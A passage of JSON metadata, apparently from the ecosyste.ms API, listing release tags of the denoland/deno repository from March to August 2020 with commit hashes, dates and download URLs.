/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fden